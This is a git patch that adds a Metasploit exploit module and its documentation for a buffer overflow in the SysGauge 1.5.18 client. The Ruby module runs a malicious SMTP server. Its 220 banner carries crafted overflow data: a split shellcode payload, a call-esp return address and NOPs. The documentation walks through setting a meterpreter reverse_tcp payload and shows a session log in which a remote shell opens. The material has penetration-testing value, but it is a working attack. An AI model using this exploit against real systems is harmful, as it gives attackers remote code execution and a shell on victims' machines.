From cc4f18e6c5c2078aa9594372f555290ca98636c8 Mon Sep 17 00:00:00 2001
From: Chris Higgins <chris@chigs.me>
Date: Tue, 14 Mar 2017 23:29:19 -0500
Subject: [PATCH] Add sysgauge_client_bof module and documentation

---
 .../windows/smtp/sysgauge_client_bof.md       | 39 +++++++++
 .../windows/smtp/sysgauge_client_bof.rb       | 87 +++++++++++++++++++
 2 files changed, 126 insertions(+)
 create mode 100644 documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md
 create mode 100644 modules/exploits/windows/smtp/sysgauge_client_bof.rb

diff --git a/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md b/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md
new file mode 100644
index 0000000000..af33a08a3a
--- /dev/null
+++ b/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md
@@ -0,0 +1,39 @@
+## Vulnerable Application
+
+  This module will setup a SMTP server expecting a connection from SysGauge 1.5.18
+via its SMTP server validation. The module sends a malicious response along in the
+220 service ready response and exploits the client resulting in an unpriviledged shell.
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/windows/smtp/sysgauge_client_bof```
+  4. Do: ```set payload windows/meterpreter/reverse_tcp```
+  5. Do: ```set LHOST ip```
+  6. Do: ```run```
+  7. The user should put your `SRVHOST` or other applicable IP address in the SMTP configuration
+in the program, and hit the "Verify Email ..." button.
+  8. You should get a shell.
+
+## Scenarios
+
+  Here is how to typically execute the module. Note that the client must input this SMTP server
+  information under SysGauge Options and hit the "Verify Email ..." button.
+
+  ```
+  msf > use exploit/windows/smtp/sysgauge_client_bof
+  msf exploit(sysgauge_client_bof) > set payload windows/meterpreter/reverse_tcp
+  payload => windows/meterpreter/reverse_tcp
+  msf exploit(sysgauge_client_bof) > set lhost 10.0.0.1
+  lhost => 10.0.0.1
+  msf exploit(sysgauge_client_bof) > exploit
+  [*] Exploit running as background job.
+  msf exploit(sysgauge_client_bof) >
+  [*] Started reverse TCP handler on 10.0.0.1:4444
+  [*] Server started.
+  [*] Client connected: 10.0.0.128
+  [*] Sending payload...
+  [*] Sending stage (957487 bytes) to 10.0.0.128
+  [*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.128:49165) at 2017-03-14 23:15:04 -0500
+  ```
diff --git a/modules/exploits/windows/smtp/sysgauge_client_bof.rb b/modules/exploits/windows/smtp/sysgauge_client_bof.rb
new file mode 100644
index 0000000000..61add663c9
--- /dev/null
+++ b/modules/exploits/windows/smtp/sysgauge_client_bof.rb
@@ -0,0 +1,87 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+#
+# Fuzzer written by corelanc0d3r - <peter.ve [at] corelan.be>
+# http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
+#
+##
+
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  include Msf::Exploit::Remote::TcpServer
+
+  def initialize()
+    super(
+      'Name'           => 'SysGauge SMTP Validation Buffer Overflow',
+      'Description'    => %q{
+        This module will setup a SMTP server expecting a connection from SysGauge 1.5.18
+        via its SMTP server validation. The module sends a malicious response along in the
+        220 service ready response and exploits the client resulting in an unpriviledged shell.
+      },
+      'Author'         =>
+      [
+        'Chris Higgins', # msf Module -- @ch1gg1ns
+        'Peter Baris'
+      ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+      [
+        [ 'EDB', '41479' ],
+      ],
+      'DefaultOptions' =>
+      {
+        'EXITFUNC' => 'thread'
+      },
+      'Payload'        =>
+      {
+        'Space' => 306,
+        'Smallest' => true,
+        'BadChars' => "\x00\x0a\x0d\x20"
+      },
+      'Platform'  => 'win',
+      'Targets'       =>
+      [
+        [ 'Windows Universal',
+          {
+            'Offset' => 176,
+            'Ret'    => 0x6527635E # call esp # QtGui4.dll
+          }
+        ]
+      ],
+      'Privileged'    => 'false',
+      'DisclosureDate' => 'Feb 28 2017',
+      'DefaultTarget' => 0
+      )
+    register_options(
+      [
+      OptPort.new('SRVPORT', [ true, "The local port to listen on.", 25 ]),
+      ], self.class)
+  end
+
+  def setup
+    super
+  end
+
+  def on_client_connect(c)
+    sploit =  "220 "
+    sploit += rand_text(target['Offset'])
+    # Can only use the last part starting from 232 bytes in
+    sploit += payload.encoded[232..-1]
+    sploit += rand_text(2)
+    sploit += [target.ret].pack('V')
+    sploit += rand_text(12)
+    sploit += make_nops(8)
+    # And the first part up to 232 bytes
+    sploit += payload.encoded[0..231]
+    sploit += "ESMTP Sendmail \r\n"
+
+    print_status("Client connected: " + c.peerhost)
+    print_status("Sending payload...")
+
+    c.put(sploit)
+  end
+
+end